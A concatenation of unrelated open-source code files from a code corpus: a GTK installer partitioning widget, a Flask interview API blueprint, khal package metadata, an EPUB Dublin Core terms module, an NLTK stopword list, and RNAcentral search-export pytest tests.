super().__init__(orientation=Gtk.Orientation.VERTICAL, spacing=6)
self.members = []
self.page_title = title
self._selected_members = set()
self._data_box = None
self._system_box = None
@property
def selected_members(self):
return self._selected_members
def _get_accordion(self):
return self.get_ancestor(Accordion)
def _make_category_label(self, name):
label = Gtk.Label()
label.set_markup("""<span fgcolor='dark grey' size='large' weight='bold'>%s</span>""" %
escape_markup(name))
label.set_halign(Gtk.Align.START)
label.set_margin_start(24)
return label
def mark_selection(self, selector):
if selector.get_chosen():
self._selected_members.add(selector)
else:
self._selected_members.discard(selector)
def add_selector(self, selector, cb):
accordion = self._get_accordion()
selector.set_page(self)
selector.connect("button-press-event", accordion.process_event, cb)
selector.connect("key-release-event", accordion.process_event, cb)
selector.connect("focus-in-event", self._on_selector_focus_in, cb)
selector.set_margin_bottom(6)
self.members.append(selector)
# pylint: disable=no-member
if selector.mount_point_type == DATA_DEVICE:
self._data_box.add(selector)
else:
self._system_box.add(selector)
def _on_selector_focus_in(self, selector, event, cb):
accordion = self._get_accordion()
cb(accordion.current_selector, selector)
def _on_selector_added(self, container, widget, label):
really_show(label)
def _on_selector_removed(self, container, widget, label):
# This runs before widget is removed from container, so if it's the last
# item then the container will still not be empty.
if len(container.get_children()) == 1:
really_hide(label)
class Page(BasePage):
""" A Page is a box that is stored in an Accordion. It breaks down all the filesystems that
comprise a single installed OS into two categories - Data filesystems and System filesystems.
Each filesystem is described by a single MountpointSelector.
"""
def __init__(self, title):
super().__init__(title)
# Create the Data label and a box to store all its members in.
self._data_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self._data_label = self._make_category_label(_("DATA"))
really_hide(self._data_label)
self._data_box.add(self._data_label)
self._data_box.connect("add", self._on_selector_added, self._data_label)
self._data_box.connect("remove", self._on_selector_removed, self._data_label)
self.add(self._data_box)
# Create the System label and a box to store all its members in.
self._system_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self._system_label = self._make_category_label(_("SYSTEM"))
really_hide(self._system_label)
self._system_box.add(self._system_label)
self._system_box.connect("add", self._on_selector_added, self._system_label)
self._system_box.connect("remove", self._on_selector_removed, self._system_label)
self.add(self._system_box)
class UnknownPage(BasePage):
def add_selector(self, selector, cb):
accordion = self._get_accordion()
selector.set_page(self)
selector.connect("button-press-event", accordion.process_event, cb)
selector.connect("key-release-event", accordion.process_event, cb)
self.members.append(selector)
self.add(selector)
class CreateNewPage(BasePage):
""" This is a special Page that is displayed when no new installation
has been automatically created, and shows the user how to go about
doing that. The intention is that an instance of this class will be
packed into the Accordion first and then when the new installation
is created, it will be removed and replaced with a Page for it.
"""
def __init__(self, title, create_clicked_cb, autopart_type_changed_cb,
partitions_to_reuse=True):
super().__init__(title)
# Create a box where we store the "Here's how you create a new blah" info.
self._createBox = Gtk.Grid()
self._createBox.set_row_spacing(6)
self._createBox.set_column_spacing(6)
self._createBox.set_margin_start(16)
label = Gtk.Label(label=_("You haven't created any mount points for your "
"%(product)s %(version)s installation yet. "
"You can:") % {"product" : productName, "version" : productVersion},
wrap=True, xalign=0, yalign=0.5)
self._createBox.attach(label, 0, 0, 2, 1)
dot = Gtk.Label(label="•", xalign=0.5, yalign=0.4, hexpand=False)
self._createBox.attach(dot, 0, 1, 1, 1)
self._createNewButton = Gtk.LinkButton(uri="",
label=C_("GUI|Custom Partitioning|Autopart Page", "_Click here to create them automatically."))
label = self._createNewButton.get_children()[0]
label.set_xalign(0)
label.set_yalign(0.5)
label.set_hexpand(True)
label.set_line_wrap(True)
label.set_use_underline(True)
# Create this now to pass into the callback. It will be populated later
# on in this method.
store = Gtk.ListStore(str, int)
combo = Gtk.ComboBox(model=store)
cellrendr = Gtk.CellRendererText()
combo.pack_start(cellrendr, True)
combo.add_attribute(cellrendr, "text", 0)
combo.connect("changed", autopart_type_changed_cb)
self._createNewButton.set_has_tooltip(False)
self._createNewButton.set_halign(Gtk.Align.START)
self._createNewButton.connect("clicked", create_clicked_cb, combo)
self._createNewButton.connect("activate-link", lambda *args: Gtk.true())
self._createBox.attach(self._createNewButton, 1, 1, 1, 1)
dot = Gtk.Label(label="•", xalign=0.5, yalign=0, hexpand=False)
self._createBox.attach(dot, 0, 2, 1, 1)
label = Gtk.Label(label=_("Create new mount points by clicking the '+' button."),
xalign=0, yalign=0.5, hexpand=True, wrap=True)
self._createBox.attach(label, 1, 2, 1, 1)
if partitions_to_reuse:
dot = Gtk.Label(label="•", xalign=0.5, yalign=0, hexpand=False)
self._createBox.attach(dot, 0, 3, 1, 1)
label = Gtk.Label(label=_("Or, assign new mount points to existing "
"partitions after selecting them below."),
xalign=0, yalign=0.5, hexpand=True, wrap=True)
self._createBox.attach(label, 1, 3, 1, 1)
label = Gtk.Label(label=C_("GUI|Custom Partitioning|Autopart Page", "_New mount points will use the following partitioning scheme:"),
xalign=0, yalign=0.5, wrap=True, use_underline=True)
self._createBox.attach(label, 0, 4, 2, 1)
label.set_mnemonic_widget(combo)
default = None
for name, code in get_supported_autopart_choices():
itr = store.append([_(name), code])
if code == DEFAULT_AUTOPART_TYPE:
default = itr
combo.set_margin_start(18)
combo.set_margin_end(18)
combo.set_hexpand(False)
combo.set_active_iter(default or store.get_iter_first())
self._createBox.attach(combo, 0, 5, 2, 1)
self.add(self._createBox)
| gpl-2.0 | -7,701,931,762,083,401,000 | 37.894353 | 141 | 0.614527 | false |
michaelnetbiz/mistt-solution | app/controllers/interviews.py | 1 | 2627 | from app import db
from app.models.interviews import InterviewSevenDays, InterviewNinetyDays
from flask import Blueprint, make_response, jsonify
from flask_cors import cross_origin
from flask_login import login_required
# instantiate the module's blueprint
interviews = Blueprint('interviews', __name__, template_folder='interviews', url_prefix='/interviews')
@cross_origin()
@interviews.route('/seven/', methods=['GET', 'POST'])
@login_required
def get_interviews_7_days():
return make_response(jsonify([service_plan for service_plan in db.InterviewSevenDays.find()]), 200)
@cross_origin()
@interviews.route('/seven/descriptives/', methods=['GET', 'POST'])
@login_required
def get_interviews_7_days_descriptives():
return make_response(jsonify([service_plan for service_plan in db.InterviewSevenDays.find()]), 200)
@cross_origin()
@interviews.route('/ninety/', methods=['GET', 'POST'])
@login_required
def get_interviews_90_days():
return make_response(jsonify([service_plan for service_plan in db.InterviewNinetyDays.find()]), 200)
@cross_origin()
@interviews.route('/ninety/descriptives/', methods=['GET', 'POST'])
@login_required
def get_interviews_90_days_descriptives():
return make_response(jsonify([service_plan for service_plan in db.InterviewNinetyDays.find()]), 200)
@cross_origin()
@interviews.route('/seven/scores/<string:_id>/', methods=['GET', 'POST'])
@login_required
def get_interview_7_days_scores(_id):
return make_response(jsonify(db.InterviewSevenDays.find_one_or_404({'_id': _id})), 200)
@cross_origin()
@interviews.route('/ninety/scores/<string:_id>/', methods=['GET', 'POST'])
@login_required
def get_interview_90_days_scores(_id):
return make_response(jsonify(db.InterviewNinetyDays.find_one_or_404({'_id': _id})), 200)
@cross_origin()
@interviews.route('/seven/<string:_id>/', methods=['GET', 'POST'])
@login_required
def get_interview_7_days(_id):
return make_response(jsonify(db.InterviewNinetyDays.find_one_or_404({'_id': _id})), 200)
@cross_origin()
@interviews.route('/ninety/<string:_id>/', methods=['GET', 'POST'])
@login_required
def get_interview_90_days(_id):
return make_response(jsonify(db.InterviewNinetyDays.find_one_or_404({'_id': _id})), 200)
@cross_origin()
@interviews.route('/seven/count/', methods=['GET', 'POST'])
@login_required
def get_interviews_7_days_count():
return make_response(jsonify(db['interview_7_days'].count()))
@cross_origin()
@interviews.route('/ninety/count/', methods=['GET', 'POST'])
@login_required
def get_interviews_90_days_count():
return make_response(jsonify(db['interview_90_days'].count()))
| mit | -7,827,549,883,789,478,000 | 32.679487 | 104 | 0.719833 | false |
hobarrera/khal | khal/__init__.py | 1 | 1725 | # Copyright (c) 2013-2017 Christian Geier et al.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
try:
from khal.version import version
except ImportError:
import sys
sys.exit('Failed to find (autogenerated) version.py. This might be due to '
'using GitHub\'s tarballs or svn access. Either clone '
'from GitHub via git or get a tarball from PyPI.')
__productname__ = 'khal'
__version__ = version
__author__ = 'Christian Geier'
__copyright__ = 'Copyright (c) 2013-2017 Christian Geier et al.'
__author_email__ = '[email protected]'
__description__ = 'A standards based terminal calendar'
__license__ = 'Expat/MIT, see COPYING'
__homepage__ = 'https://lostpackets.de/khal/'
| mit | 2,818,969,302,320,337,000 | 45.621622 | 79 | 0.738551 | false |
meng89/epubuilder | epubaker/metas/dcterms.py | 1 | 2746 | # coding=utf-8
"""Dublin Core Metadata Initiative, see http://dublincore.org/documents/dcmi-terms/"""
from epubaker.metas.attrs import Attrs, AltScript, Dir, FileAs, Id, Role, Lang
from epubaker.xl import Element, URI_XML
def always_true(*args, **kwargs):
pass
l = [
'abstract', 'accessRights', 'accrualMethod', 'accrualPeriodicity', 'accrualPolicy', 'alternative', 'audience',
'available',
'bibliographicCitation',
'conformsTo', 'contributor', 'coverage', 'created', 'creator',
'date', 'dateAccepted', 'dateCopyrighted', 'dateSubmitted', 'description',
'educationLevel', 'extent',
'format',
'hasFormat', 'hasPart', 'hasVersion',
'identifier', 'instructionalMethod',
'isFormatOf', 'isPartOf', 'isReferencedBy', 'isReplacedBy', 'isRequiredBy', 'issued', 'isVersionOf',
'language', 'license',
'mediator', 'medium', 'modified',
'provenance', 'publisher',
'references', 'relation', 'replaces', 'requires', 'rights', 'rightsHolder',
'source', 'spatial', 'subject',
'tableOfContents', 'temporal', 'title', 'type',
'valid'
]
check_funcs = {
'modified': always_true,
}
check_funcs.update(dict((one, always_true) for one in l if one not in check_funcs.keys()))
_attr_check_funcs = {
# identifier only
'opf:scheme': always_true,
'opf:alt-script': always_true,
'dir': always_true,
'opf:file-as': always_true,
'id': always_true,
'opf:role': always_true,
'xml:lang': always_true,
# subject only
'opf:authority': always_true,
# Meta only
'scheme': always_true
}
URI_DC = 'http://purl.org/dc/elements/1.1/'
URI_OPF = 'http://www.idpf.org/2007/opf'
namespace_map = {
'dc': URI_DC,
'opf': URI_OPF,
'xml': URI_XML
}
class _Base(Attrs):
def __init__(self, text):
check_funcs[self.__class__.__name__](text)
Attrs.__init__(self)
self._text = text
@property
def text(self):
return self._text
def to_element(self):
e = Element((None, 'meta'))
e.attributes[(None, 'property')] = 'dcterms:{}'.format(self.__class__.__name__)
for attr_name, value in self._attrs.items():
uri = None
if ':' in attr_name:
prefix, attr = attr_name.split(':')
uri = namespace_map[prefix]
e.prefixes[uri] = prefix
else:
attr = attr_name
e.attributes[(uri, attr)] = value
e.children.append(self.text)
return e
_classes = {}
for k, v in check_funcs.items():
_classes[k] = type(k, (_Base, AltScript, Dir, FileAs, Id, Role, Lang), {})
def get_dcterm(name):
"""get a term class by term name"""
return _classes[name]
| mit | -3,042,853,000,001,800,700 | 23.300885 | 114 | 0.59177 | false |
Darth-Neo/Gensim | Pattern/stopWords.py | 1 | 1347 |
# Used to add words to the stoplist
from nltk.corpus import stopwords
stop = stopwords.words(u'english')
# Add Stopwords
stop.append(u"of")
stop.append(u"the")
stop.append(u"not")
stop.append(u"to")
stop.append(u"or")
stop.append(u"this")
stop.append(u"all")
stop.append(u"on")
stop.append(u"with")
stop.append(u"we")
stop.append(u"in")
stop.append(u"This")
stop.append(u"The")
stop.append(u",")
stop.append(u".")
stop.append(u"..")
stop.append(u"...")
stop.append(u"...).")
stop.append(u"\")..")
stop.append(u".")
stop.append(u";")
stop.append(u"/")
stop.append(u")")
stop.append(u"(")
stop.append(u"must")
stop.append(u"system")
stop.append(u"This")
stop.append(u"The")
stop.append(u",")
stop.append(u"must")
stop.append(u"and")
stop.append(u"of")
stop.append(u"by")
stop.append(u"program")
stop.append(u"analysis")
stop.append(u"solution")
stop.append(u"stage")
stop.append(u"updated")
stop.append(u"\u2022")
stop.append(u"<h2>")
stop.append(u"</h2>")
stop.append(u"</strong></h2>")
stop.append(u"raportal")
stop.append(u"project")
stop.append(u"Project")
stop.append(u"wbs")
stop.append(u"WBS")
strp = list()
strp.append(u"<strong>")
strp.append(u"a>")
strp.append(u"<a>")
strp.append(u"<strong>")
strp.append(u"</")
strp.append(u"</h2")
strp.append(u"ttp://")
strp.append(u">")
strp.append(u"<a></a>")
strp.append(u"1>")
strp.append(u"\n") | gpl-3.0 | 1,625,549,348,415,467,000 | 19.424242 | 35 | 0.673348 | false |
RNAcentral/rnacentral-import-pipeline | tests/rnacentral/search_export/exporter_test.py | 1 | 37307 | # -*- coding: utf-8 -*-
"""
Copyright [2009-2017] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import json
import operator as op
import os
import re
import subprocess
import tempfile
import xml.etree.ElementTree as ET
from functools import lru_cache
from xml.dom import minidom
import pytest
import six
from rnacentral_pipeline.rnacentral.search_export import exporter
from tests.helpers import run_range_as_single, run_with_replacements
# Parse out all UPIs
# Create temp table of UPI to get metadata for
# Run queries generating all metadata for those UPIs
# Delete UPI table
METADATA = None
META_REPLACEMENTS = {
"crs.sql": (
"WHERE",
"WHERE features.upi || '_' || features.taxid IN ({urs})\nAND",
),
"feedback.sql": (
"FROM rnc_feedback_overlap overlap",
"FROM rnc_feedback_overlap overlap\n WHERE overlap.upi_taxid IN ({urs})",
),
"go_annotations.sql": (
"GROUP BY anno.rna_id",
"WHERE anno.rna_id IN ({urs})\nGROUP BY anno.rna_id",
),
"interacting-proteins.sql": (
"WHERE",
"WHERE related.source_urs_taxid in ({urs})\n AND",
),
"interacting-rnas.sql": (
"WHERE",
"WHERE related.source_urs_taxid in ({urs})\n AND",
),
"secondary-structure.sql": ("WHERE", "WHERE pre.id in ({urs})\n AND"),
}
@lru_cache()
def load_metadata():
# I am using this parse the test file and pull out all URS ids that are in a
# test. We then use this list to only extract metadata for the selected
# sequences. This is much faster and easier on the memory requiremens
# than trying to get all data.
with open(__file__, "r") as raw:
urs = re.findall("URS\w+", raw.read())
print(len(urs))
urs_string = ", ".join("'%s'" % u for u in urs)
metapath = os.path.join("files", "search-export", "metadata")
buf = six.moves.cStringIO()
for filename in os.listdir(metapath):
path = os.path.join(metapath, filename)
raw, replace = META_REPLACEMENTS[filename]
replacements = (raw, replace.format(urs=urs_string))
data = run_with_replacements(path, replacements, take_all=True)
for entry in data:
buf.write(json.dumps(entry))
buf.write("\n")
buf.seek(0)
return exporter.parse_additions(buf)
def load_data(upi):
path = os.path.join("files", "search-export", "query.sql")
entry = run_range_as_single(upi, path)
data = exporter.builder(load_metadata(), entry)
return data
def as_xml_dict(element):
return {"attrib": element.attrib, "text": element.text}
def load_and_findall(upi, selector):
data = load_data(upi)
return [as_xml_dict(d) for d in data.findall(selector)]
def load_and_get_additional(upi, field_name):
selector = "./additional_fields/field[@name='%s']" % field_name
return load_and_findall(upi, selector)
def load_and_get_cross_references(upi, db_name):
selector = "./cross_references/ref[@dbname='%s']" % db_name
results = load_and_findall(upi, selector)
assert results
return results
def pretty_xml(data):
ugly = ET.tostring(data)
flattened = ugly.decode()
flattened = flattened.replace("\n", "")
parsed = minidom.parseString(flattened)
return parsed.toprettyxml().lower()
@pytest.mark.parametrize(
"filename", ["data/export/search/" + f for f in os.listdir("data/export/search/")]
)
def test_it_builds_correct_xml_entries(filename):
result = ET.parse(filename)
upi = os.path.basename(filename).replace(".xml", "")
print(pretty_xml(load_data(upi)))
print(pretty_xml(result.getroot()))
assert pretty_xml(load_data(upi)) == pretty_xml(result.getroot())
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
("URS0000730885_9606", "Homo sapiens"),
("URS00008CC2A4_43179", "Ictidomys tridecemlineatus"),
# ('URS0000713CBE_408172', 'marine metagenome'),
# ('URS000047774B_77133', 'uncultured bacterium'),
],
)
def test_assigns_species_correctly(upi, ans):
"""
Assigns species names correctly.
"""
assert load_and_get_additional(upi, "species") == [
{"attrib": {"name": "species"}, "text": ans}
]
@pytest.mark.skip() # pylint: disable=E1101
def test_assigns_product_correctly(upi, ans):
assert load_data(upi).additional_fields.product == ans
@pytest.mark.parametrize(
"upi,name",
[
("URS0000730885_9606", "human"),
("URS000074C6E6_7227", "fruit fly"),
("URS00003164BE_77133", None),
],
)
def test_assigns_common_name_correctly(upi, name):
ans = []
if name:
ans = [{"attrib": {"name": "common_name"}, "text": name}]
assert load_and_get_additional(upi, "common_name") == ans
@pytest.mark.parametrize(
"upi,function",
[
("URS000000079A_87230", []),
("URS0000044908_2242", ["tRNA-Arg"]),
],
)
def test_assigns_function_correctly(upi, function):
ans = [{"attrib": {"name": "function"}, "text": f} for f in function]
assert load_and_get_additional(upi, "function") == ans
@pytest.mark.parametrize(
"upi,ans",
[
("URS00004A23F2_559292", ["tRNA-Ser-GCT-1-1", "tRNA-Ser-GCT-1-2"]),
("URS0000547AAD_7227", ["EG:EG0002.2"]),
("URS00006DCF2F_387344", ["rrn"]),
("URS00006B19C2_77133", []),
("URS0000D5E5D0_7227", ["FBgn0286039"]),
],
)
def test_assigns_gene_correctly(upi, ans):
assert sorted(d["text"] for d in load_and_get_additional(upi, "gene")) == ans
@pytest.mark.parametrize(
"upi,genes",
[
("URS00006B19C2_77133", set([])),
("URS0000547AAD_7227", {"FBgn0019661", "roX1"}),
("URS0000D5E40F_7227", {"CR46362"}),
(
"URS0000773F8D_7227",
{
"CR46280",
"dme-mir-9384",
r"Dmel\CR46280",
},
),
(
"URS0000602386_7227",
{
"276a",
"CR33584",
"CR33585",
"CR43001",
r"Dmel\CR43001",
"MIR-276",
"MiR-276a",
"dme-miR-276a",
"dme-miR-276a-3p",
"dme-mir-276",
"dme-mir-276a",
"miR-276",
"miR-276a",
"miR-276aS",
"mir-276",
"mir-276aS",
"rosa",
},
),
(
"URS000060F735_9606",
{
"ASMTL-AS",
"ASMTL-AS1",
"ASMTLAS",
"CXYorf2",
# 'ENSG00000236017.2',
# 'ENSG00000236017.3',
# 'ENSG00000236017.8',
"ENSGR0000236017.2",
"NCRNA00105",
"OTTHUMG00000021056.2",
},
),
],
)
def test_assigns_gene_synonym_correctly(upi, genes):
val = {a["text"] for a in load_and_get_additional(upi, "gene_synonym")}
assert val == genes
@pytest.mark.parametrize(
"upi,transcript_ids",
[
("URS0000D5E5D0_7227", {"FBtr0473389"}),
],
)
def test_can_search_using_flybase_transcript_ids(upi, transcript_ids):
val = {c["attrib"]["dbkey"] for c in load_and_get_cross_references(upi, "FLYBASE")}
assert val == transcript_ids
@pytest.mark.parametrize(
"upi,gene,symbol",
[
pytest.param(
"URS000013BC78_4896", "SPSNORNA.29", "sno52", marks=pytest.mark.xfail
),
],
)
def test_can_search_for_pombase_ids(upi, gene, symbol):
val = {x["text"] for x in load_and_get_additional(upi, "gene")}
assert gene in val
val = {x["text"] for x in load_and_get_additional(upi, "gene_synonym")}
assert symbol in val
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
("URS000047774B_77133", 594),
("URS0000000559_77133", 525),
("URS000000055B_479808", 163),
# ('URS0000000635_283360', 166),
("URS0000000647_77133", 1431),
("URS000087608D_77133", 1378),
("URS0000000658_317513", 119),
("URS0000000651_1005506", 73),
("URS0000000651_1128969", 73),
# ('URS0000000653_502127', 173),
],
)
def test_assigns_length_correctly(upi, ans):
assert load_and_get_additional(upi, "length") == [
{"attrib": {"name": "length"}, "text": str(ans)}
]
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
("URS00006C4604_1094186", "294dd04c4468af596c2bc963108c94d5"),
("URS00000000A8_77133", "1fe472d874a850b4a6ea11f665531637"),
("URS0000753F51_77133", "c141e8f137bf1060aa10817a1ac30bb1"),
("URS0000000004_77133", "030c78be0f492872b95219d172e0c658"),
# ('URS000000000E_175245', '030ca7ba056f2fb0bd660cacdb95b726'),
("URS00000000CC_29466", "1fe49d2a685ee4ce305685cd597fb64c"),
("URS0000000024_77133", "6bba748d0b52b67d685a7dc4b07908fa"),
# ('URS00006F54ED_10020', 'e1bc9ef45f3953a364b251f65e5dd3bc'), # May no longer have active xrefs
("URS0000000041_199602", "030d4da42d219341ad1d1ab592cf77a2"),
("URS0000000065_77133", "030d80f6335df3316afdb54fc1ba1756"),
],
)
def test_assigns_md5_correctly(upi, ans):
assert load_and_get_additional(upi, "md5") == [
{"attrib": {"name": "md5"}, "text": str(ans)}
]
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
(
"URS0000062D2A_77133",
"uncultured bacterium partial contains 16S ribosomal RNA, 16S-23S ribosomal RNA intergenic spacer, and 23S ribosomal RNA",
),
("URS00000936FF_9606", "Homo sapiens (human) piR-56608"),
("URS00000C45DB_10090", "Mus musculus (house mouse) piR-101106"),
("URS0000003085_7460", "Apis mellifera (honey bee) ame-miR-279a-3p"),
(
"URS00000C6428_980671",
"Lophanthus lipskyanus partial external transcribed spacer",
),
("URS00007268A2_9483", "Callithrix jacchus microRNA mir-1255"),
(
"URS0000A9662A_10020",
"Dipodomys ordii (Ord's kangaroo rat) misc RNA 7SK RNA (RF00100)",
),
("URS00000F8376_10090", "Mus musculus (house mouse) piR-6392"),
("URS00000F880C_9606", "Homo sapiens (human) partial ncRNA"),
(
"URS00000054D5_6239",
"Caenorhabditis elegans piwi-interacting RNA 21ur-14894",
),
(
"URS0000157781_6239",
"Caenorhabditis elegans piwi-interacting RNA 21ur-13325",
),
("URS0000005F8E_9685", "Felis catus mir-103/107 microRNA precursor"),
("URS000058FFCF_7729", u"Halocynthia roretzi tRNA Gly ÊCU"),
],
)
def test_assigns_description_correctly_to_randomly_chosen_examples(upi, ans):
assert [e["text"] for e in load_and_findall(upi, "./description")] == [ans]
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
("URS0000409697_3702", "tRNA"),
("URS0000ABD7EF_9606", "rRNA"),
("URS00001E2C22_3702", "rRNA"),
("URS00005F2C2D_4932", "rRNA"),
("URS000019E0CD_9606", "lncRNA"),
("URS00007FD8A3_7227", "lncRNA"),
("URS0000086133_9606", "misc RNA"),
("URS00007A9FDC_6239", "misc RNA"),
("URS000025C52E_9606", "other"),
("URS000075C290_9606", "precursor RNA"),
("URS0000130A6B_3702", "precursor RNA"),
("URS0000734D8F_9606", "snRNA"),
("URS000032B6B6_9606", "snRNA"),
("URS000075EF5D_9606", "snRNA"),
("URS0000569A4A_9606", "snoRNA"),
("URS00008E398A_9606", "snoRNA"),
("URS00006BA413_9606", "snoRNA"),
("URS0000A8F612_9371", "snoRNA"),
("URS000092FF0A_9371", "snoRNA"),
("URS00005D0BAB_9606", "piRNA"),
("URS00002AE808_10090", "miRNA"),
("URS00003054F4_6239", "piRNA"),
("URS00000478B7_9606", "SRP RNA"),
("URS000024083D_9606", "SRP RNA"),
("URS00002963C4_4565", "SRP RNA"),
("URS000040F7EF_4577", "siRNA"),
("URS00000DA486_3702", "other"),
# ('URS00006B14E9_6183', 'hammerhead ribozyme'),
("URS0000808D19_644", "hammerhead ribozyme"),
("URS000080DFDA_32630", "hammerhead ribozyme"),
("URS000086852D_32630", "hammerhead ribozyme"),
("URS00006C670E_30608", "hammerhead ribozyme"),
("URS000045EBF2_9606", "lncRNA"),
("URS0000157BA2_4896", "antisense RNA"),
("URS00002F216C_36329", "antisense RNA"),
("URS000075A336_9606", "miRNA"),
# ('URS0000175007_7227', 'miRNA'),
("URS000015995E_4615", "miRNA"),
("URS0000564CC6_224308", "tmRNA"),
("URS000059EA49_32644", "tmRNA"),
("URS0000764CCC_1415657", "RNase P RNA"),
("URS00005CDD41_352472", "RNase P RNA"),
# ('URS000072A167_10141', 'Y RNA'),
("URS00004A2461_9606", "Y RNA"),
("URS00005CF03F_9606", "Y RNA"),
("URS000021515D_322710", "autocatalytically spliced intron"),
("URS000012DE89_9606", "autocatalytically spliced intron"),
("URS000061DECF_1235461", "autocatalytically spliced intron"),
("URS00006233F9_9606", "ribozyme"),
("URS000080DD33_32630", "ribozyme"),
("URS00006A938C_10090", "ribozyme"),
("URS0000193C7E_9606", "scRNA"),
("URS00004B11CA_223283", "scRNA"),
# ('URS000060C682_9606', 'vault RNA'), # Not active
("URS000064A09E_13616", "vault RNA"),
("URS00003EE18C_9544", "vault RNA"),
("URS000059A8B2_7227", "rasiRNA"),
("URS00000B3045_7227", "guide RNA"),
("URS000082AF7D_5699", "guide RNA"),
("URS000077FBEB_9606", "lncRNA"),
("URS00000101E5_9606", "lncRNA"),
("URS0000A994FE_9606", "other"),
("URS0000714027_9031", "other"),
("URS000065BB41_7955", "other"),
("URS000049E122_9606", "misc RNA"),
("URS000013F331_9606", "RNase P RNA"),
("URS00005EF0FF_4577", "siRNA"),
],
)
def test_assigns_rna_type_correctly(upi, ans):
assert load_and_get_additional(upi, "rna_type") == [
{"attrib": {"name": "rna_type"}, "text": str(ans)}
]
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
(
"URS00004AFF8D_9544",
[
"ENA",
"RefSeq",
"miRBase",
],
),
("URS00001DA281_9606", ["ENA", "GtRNAdb", "HGNC", "PDBe"]),
],
)
def test_correctly_gets_expert_db(upi, ans):
data = sorted(d["text"] for d in load_and_get_additional(upi, "expert_db"))
assert data == ans
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
(
"URS00004AFF8D_9544",
{
"MIRLET7G",
"mml-let-7g-5p",
"mml-let-7g",
"let-7g-5p",
"let-7g",
"let-7",
},
),
(
"URS00001F1DA8_9606",
{
"MIR126",
"hsa-miR-126",
"hsa-miR-126-3p",
"miR-126",
"miR-126-3p",
},
),
],
)
def test_correctly_assigns_mirbase_gene_using_product(upi, ans):
data = load_and_get_additional(upi, "gene")
val = set(d["text"] for d in data)
print(val)
print(ans)
assert val == ans
@pytest.mark.skip() # pylint: disable=E1101
def test_correctly_assigns_active(upi, ans):
assert load_data(upi).additional_fields.is_active == ans
# Test that this assigns authors from > 1 publications to a single set
@pytest.mark.skip() # pylint: disable=E1101
def test_assigns_authors_correctly(upi, ans):
assert load_data(upi).additional_fields.authors == ans
@pytest.mark.parametrize(
"upi,ans",
[
# Very slow on test, but ok on production
# ('URS000036D40A_9606', 'mitochondrion'),
("URS00001A9410_109965", "mitochondrion"),
("URS0000257A1C_10090", "plastid"),
("URS00002A6263_3702", "plastid:chloroplast"),
("URS0000476A1C_3702", "plastid:chloroplast"),
],
)
def test_assigns_organelle_correctly(upi, ans):
assert load_and_get_additional(upi, "organelle") == [
{"attrib": {"name": "organelle"}, "text": str(ans)}
]
@pytest.mark.parametrize(
"upi,ans",
[
(
"URS000000079A_87230",
[
{"attrib": {"dbname": "ENA", "dbkey": "AM233399.1"}, "text": None},
{
"attrib": {"dbkey": "87230", "dbname": "ncbi_taxonomy_id"},
"text": None,
},
],
)
],
)
def test_can_assign_correct_cross_references(upi, ans):
data = load_data(upi)
results = data.findall("./cross_references/ref")
assert [as_xml_dict(r) for r in results] == ans
def test_can_create_document_with_unicode():
key = op.itemgetter("text")
val = sorted(load_and_get_additional("URS000009EE82_562", "product"), key=key)
assert val == sorted(
[
{"attrib": {"name": "product"}, "text": u"tRNA-Asp(gtc)"},
{"attrib": {"name": "product"}, "text": u"P-site tRNA Aspartate"},
{"attrib": {"name": "product"}, "text": u"transfer RNA-Asp"},
{"attrib": {"name": "product"}, "text": u"tRNA_Asp_GTC"},
{"attrib": {"name": "product"}, "text": u"tRNA-asp"},
{"attrib": {"name": "product"}, "text": u"tRNA Asp ⊄UC"},
{"attrib": {"name": "product"}, "text": u"tRNA-Asp"},
{"attrib": {"name": "product"}, "text": u"tRNA-Asp-GTC"},
{"attrib": {"name": "product"}, "text": u"ASPARTYL TRNA"},
{"attrib": {"name": "product"}, "text": u"tRNA-Asp (GTC)"},
],
key=key,
)
def test_it_can_handle_a_list_in_ontology():
data = load_data("URS00003B5CA5_559292")
results = data.findall("./cross_references/ref")
xrefs = {as_xml_dict(r)["attrib"]["dbkey"] for r in results}
assert {"ECO:0000202", u"GO:0030533", "SO:0000253"} & xrefs
# @pytest.mark.skip()
# def test_produces_correct_count():
# entries = exporter.range(db(), 1, 100)
# with tempfile.NamedTemporaryFile() as out:
# exporter.write(out, entries)
# out.flush()
# with open(out.name, 'r') as raw:
# parsed = ET.parse(raw)
# count = parsed.find('./entry_count')
# assert count.text == '105'
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
("URS0000759CF4_9606", 9606),
("URS0000724ACA_7955", 7955),
("URS000015E0AD_10090", 10090),
("URS00005B8078_3702", 3702),
("URS0000669249_6239", 6239),
("URS0000377114_7227", 7227),
